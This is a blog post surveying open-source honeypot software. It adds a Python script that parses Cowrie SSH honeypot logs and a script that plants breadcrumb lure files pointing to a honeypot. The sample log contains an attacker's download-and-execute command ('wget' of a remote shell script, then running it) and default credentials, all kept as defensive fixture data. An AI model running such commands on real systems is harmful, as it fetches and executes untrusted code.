For my thesis I researched a lot of resources regarding honeypots, including a number of open-source software packages. Before I clean up my bookmark bar and remove those references, I thought they might be interesting to others. Maybe someone out there is searching for exactly this, so why not share my findings?
Amun is a rather outdated malware honeypot that builds on Nepenthes, the result of academic research from 2006. I did not use it, so I cannot comment on its functionality. You should use the Nepenthes successor Dionaea instead.
Dionaea is another Nepenthes successor with improved detection of shellcode in exploit payloads: it uses libemu to recognise and emulate the shellcode and extract the URL from which the malware is to be downloaded. It collects malware by emulating vulnerable services such as FTP, SMB, HTTP, TFTP, MSSQL and MySQL and letting the exploit run against the emulation. If you are interested in malware samples and database exploits, this is the right honeypot to use.
Kippo is an SSH honeypot that is widely used in academia for different purposes. Its development has stalled for some time, so a fork was created as its successor: Cowrie.
Cowrie is an SSH and Telnet honeypot. This is one of the coolest honeypots I used, mainly because of its rich features. It emulates an SSH (or Telnet) service together with an interactive shell on a fake file system, so you can record every command the attacker types and log the username/password combinations used to log in. A preconfigured Docker image is available if you want to try it out. I wrote about this software in a previous blog post.
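To make the "collect what a user enters" and "catch the credentials" points concrete, here is a small script that turns Cowrie's JSON log into a credential tally, a per-session command list and the download URLs the attacker tried to fetch. This is an added example, not code from the original post or from the Cowrie project; it assumes Cowrie's JSON output (one JSON object per line in var/log/cowrie/cowrie.json) with the event ids cowrie.login.failed, cowrie.login.success and cowrie.command.input and the field names username, password, input, session and src_ip. The log lines are constructed, not captured, and use documentation IP ranges.

```python
"""Summarise a Cowrie JSON log: credentials tried and commands entered per session."""
import json
import re
from collections import Counter, defaultdict

# Constructed sample in the shape of Cowrie's var/log/cowrie/cowrie.json
# (one JSON object per line). Addresses are from documentation ranges.
# The last line is deliberately not JSON to show that the parser skips junk.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.7","src_port":51234,"dst_ip":"10.0.0.5","dst_port":2222,"session":"a1b2c3d4e5f6","protocol":"ssh","timestamp":"2019-03-01T10:00:00.000000Z","sensor":"hp01","message":"New connection: 203.0.113.7:51234 (10.0.0.5:2222) [session: a1b2c3d4e5f6]"}
{"eventid":"cowrie.login.failed","username":"root","password":"admin","session":"a1b2c3d4e5f6","src_ip":"203.0.113.7","timestamp":"2019-03-01T10:00:01.000000Z","sensor":"hp01","message":"login attempt [root/admin] failed"}
{"eventid":"cowrie.login.success","username":"root","password":"123456","session":"a1b2c3d4e5f6","src_ip":"203.0.113.7","timestamp":"2019-03-01T10:00:02.000000Z","sensor":"hp01","message":"login attempt [root/123456] succeeded"}
{"eventid":"cowrie.command.input","input":"uname -a","session":"a1b2c3d4e5f6","src_ip":"203.0.113.7","timestamp":"2019-03-01T10:00:03.000000Z","sensor":"hp01","message":"CMD: uname -a"}
{"eventid":"cowrie.command.input","input":"cd /tmp; wget http://198.51.100.9/x.sh; sh x.sh","session":"a1b2c3d4e5f6","src_ip":"203.0.113.7","timestamp":"2019-03-01T10:00:05.000000Z","sensor":"hp01","message":"CMD: cd /tmp; wget http://198.51.100.9/x.sh; sh x.sh"}
{"eventid":"cowrie.session.closed","duration":6.1,"session":"a1b2c3d4e5f6","src_ip":"203.0.113.7","timestamp":"2019-03-01T10:00:06.000000Z","sensor":"hp01","message":"Connection lost after 6 seconds"}
{"eventid":"cowrie.login.failed","username":"root","password":"admin","session":"0f0f0f0f0f0f","src_ip":"198.51.100.23","timestamp":"2019-03-01T10:05:00.000000Z","sensor":"hp01","message":"login attempt [root/admin] failed"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","session":"0f0f0f0f0f0f","src_ip":"198.51.100.23","timestamp":"2019-03-01T10:05:01.000000Z","sensor":"hp01","message":"login attempt [admin/admin] failed"}
not json: a truncated write or log-rotation artefact
"""

LOGIN_EVENTS = ("cowrie.login.failed", "cowrie.login.success")
URL_RE = re.compile(r"(?:https?|ftp|tftp)://[^\s;'\"|&<>]+")


def parse_events(text):
    """Return one dict per well-formed JSON line; silently skip anything else."""
    events = []
    for raw in text.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        try:
            events.append(json.loads(raw))
        except json.JSONDecodeError:
            continue  # partial line, rotation noise, etc.
    return events


def summarize(text):
    """Aggregate credentials and per-session command lists from a Cowrie JSON log."""
    events = parse_events(text)
    creds = Counter()
    sessions = defaultdict(lambda: {"src_ip": None, "logged_in": False, "commands": []})
    for e in events:
        eid = e.get("eventid")
        sess = sessions[e.get("session")]
        sess["src_ip"] = e.get("src_ip", sess["src_ip"])
        if eid in LOGIN_EVENTS:
            # count every attempt, successful or not: the tally shows which
            # credentials are being sprayed against the honeypot
            creds[(e.get("username", ""), e.get("password", ""))] += 1
            if eid == "cowrie.login.success":
                sess["logged_in"] = True
        elif eid == "cowrie.command.input":
            sess["commands"].append(e.get("input", ""))
    return {"events": len(events), "credentials": creds, "sessions": dict(sessions)}


def download_urls(summary):
    """URLs that appear in typed commands: the droppers an attacker tried to fetch."""
    urls = []
    for sess in summary["sessions"].values():
        for cmd in sess["commands"]:
            urls.extend(URL_RE.findall(cmd))
    return urls


if __name__ == "__main__":
    s = summarize(SAMPLE_LOG)
    print(f"{s['events']} events, {len(s['sessions'])} sessions")
    for (user, pw), n in s["credentials"].most_common():
        print(f"  {n}x {user}:{pw}")
    for sid, sess in s["sessions"].items():
        if sess["logged_in"]:
            print(f"session {sid} from {sess['src_ip']}: {sess['commands']}")
    print("download URLs:", download_urls(s))
```

Run it against a real log with `summarize(open("cowrie.json").read())`. The parser skips malformed lines on purpose: a log that is being written while you read it, or one stitched together from rotated files, routinely contains a cut-off line, and one bad line should not abort the whole analysis.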
sshesame is an SSH honeypot that accepts any password, any connection attempt and any request. It probably only catches automated exploitation, as it is very simple and does not try to emulate a terminal like Cowrie does.
HonSSH is a “high-interaction” honeypot, which means it uses a real system to deceive an attacker. From the description, it is basically a proxy (a man-in-the-middle) between an attacker and a real SSH server: it terminates the attacker's SSH connection itself and opens a second SSH connection to the real server, which is what lets it see and log the otherwise encrypted traffic. I have not tried it, but it looked really promising.
Heralding is the right tool if you are only interested in credentials (i.e. usernames and plaintext passwords): it speaks the login phase of several protocols (FTP, Telnet, SSH, POP3, IMAP, SMTP, HTTP and others) and logs what was tried, without emulating much beyond that. I only tested it for a few minutes, but it looks promising and might be useful for specific use cases.
Glastopf is a web application honeypot: it emulates vulnerable web applications (SQL injection, remote and local file inclusion and the like) and answers exploitation attempts with plausible responses, so it collects the payloads that attackers send. It works well with default settings, but you can tweak it a lot. It has a successor (see below) and is still maintained by the Austrian MushMush foundation.
SNARE and TANNER are two parts of one concept: turning an existing website into a web honeypot. SNARE clones the site and serves it as the attack surface, while TANNER analyses the incoming requests and decides how SNARE should respond. They are the successors of Glastopf and have a lot of interesting features. Unfortunately, I was not able to try them out yet.
Artillery is “a combination of a honeypot, monitoring tool, and alerting system”. Basically, it opens decoy ports, treats any connection to them as an intrusion and blacklists the source IP. It was not exactly relevant for my thesis, so I did not look into it that much. But it seems to work on both Linux and Windows systems, so it might be interesting for specific uses.
T-Pot is an Ubuntu server image containing a number of preconfigured honeypots plus monitoring and visualization tools; each honeypot runs in its own Docker container. If you want to monitor a number of services without any configuration, it is the right tool. Really cool software.
If you use Python and the Django web framework, you might find django-admin-honeypot interesting. It serves a fake copy of Django's built-in admin login page (while the real admin is moved to a different URL) and logs the login attempts made against it.
HoneyD operates on a lower level than most other honeypots. It answers for otherwise unused IP addresses on a network and creates virtual hosts there, each configured with a “personality” that mimics the TCP/IP stack behaviour of a real operating system. A scan of the network therefore turns up a number of hosts that do not actually exist and are only simulated. Pretty cool, unfortunately I had no use for it yet.
Honeybits is a tool that creates “breadcrumbs” to lure an attacker towards a honeypot. It automatically plants traces on a production system that lead to the honeypot (fake shell history entries, configuration files or credentials that point at it), so that an attacker who breaches that system might “find” the honeypot and interact with it.
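The breadcrumb idea is simple enough to show in a few lines. The script below is an added illustration of the technique, not Honeybits' own code: it builds three artefacts that all point at the same honeypot (a shell history with ssh/scp commands, an SSH client alias and a .netrc with plaintext credentials) and writes them below a directory you choose. The host address, user name, alias and password are illustrative assumptions; the demo plants into a throwaway temporary directory rather than a real home directory.

```python
"""Plant breadcrumbs that lead from an ordinary host to a honeypot."""
import os
import tempfile
import textwrap


def build_breadcrumbs(honeypot_host, honeypot_user="backup",
                      honeypot_password="Winter2018!", alias="bak01"):
    """Return {relative path: content} for the files to plant.

    The lure is mixed with mundane history entries so the honeypot is not the
    only thing in the file, and every file points at the same host so that a
    login with the planted credentials ties an alert back to this breadcrumb set.
    All values are illustrative assumptions, not Honeybits defaults.
    """
    history = [
        "ls -la",
        "cd /var/log",
        "tail -n 50 syslog",
        f"ssh {honeypot_user}@{honeypot_host}",
        "cd ~",
        f"scp db-dump.sql.gz {alias}:/srv/backup/",
        "history | tail",
    ]
    return {
        # shell history: commands an attacker grepping for other hosts will find
        ".bash_history": "\n".join(history) + "\n",
        # ssh client config: an alias that resolves to the honeypot
        ".ssh/config": textwrap.dedent(f"""\
            Host {alias}
                HostName {honeypot_host}
                User {honeypot_user}
                Port 22
        """),
        # .netrc: plaintext credentials that only the honeypot will ever accept
        ".netrc": f"machine {honeypot_host} login {honeypot_user} password {honeypot_password}\n",
    }


def plant_breadcrumbs(target_dir, **kwargs):
    """Write the breadcrumbs below target_dir and return the paths written."""
    written = []
    for rel, content in build_breadcrumbs(**kwargs).items():
        path = os.path.join(target_dir, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
        os.chmod(path, 0o600)  # a world-readable .netrc would look staged
        written.append(path)
    return written


def files_mentioning(paths, needle):
    """Read the planted files back and return those containing needle (self-check)."""
    hits = []
    for path in paths:
        with open(path) as fh:
            if needle in fh.read():
                hits.append(path)
    return hits


def demo(honeypot_host="10.9.8.7"):
    """Plant into a throwaway directory; return (paths, paths mentioning the host)."""
    target = tempfile.mkdtemp(prefix="breadcrumbs-")
    paths = plant_breadcrumbs(target, honeypot_host=honeypot_host)
    return paths, files_mentioning(paths, honeypot_host)


if __name__ == "__main__":
    paths, hits = demo()
    for p in paths:
        print(("bait  " if p in hits else "inert ") + p)
```

Two practical caveats: the honeypot has to accept (or at least log) exactly the planted user name and password, otherwise the breadcrumb leads nowhere, and any login with that pair should raise an alert, because nobody but a follower of the breadcrumb ever knows those credentials. Dates on the planted files also matter; files created seconds before a breach stand out in `ls -la` output.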
p0f v3 is a rather powerful passive fingerprinting tool that works on the network level. It does not send any packets itself; it inspects the TCP/IP headers (and some application-layer data such as HTTP) of the connections it observes and fingerprints the remote hosts from that. Besides identifying connecting IPs, it adds a ton of interesting information, such as the likely OS version, link type and MTU, uptime and whether the client sits behind NAT.
Here are some other resources that I found useful during my research:
- The honeypot software list of BlackArch, a penetration testing distribution based on Arch Linux.
- The Honeynet Project, which collects various tools developed over time. Founded in 1999, it has a lot of outdated and dead links, but some resources are still accessible and interesting to read.
- HoneyDB, a community-driven collection of honeypot sensor data.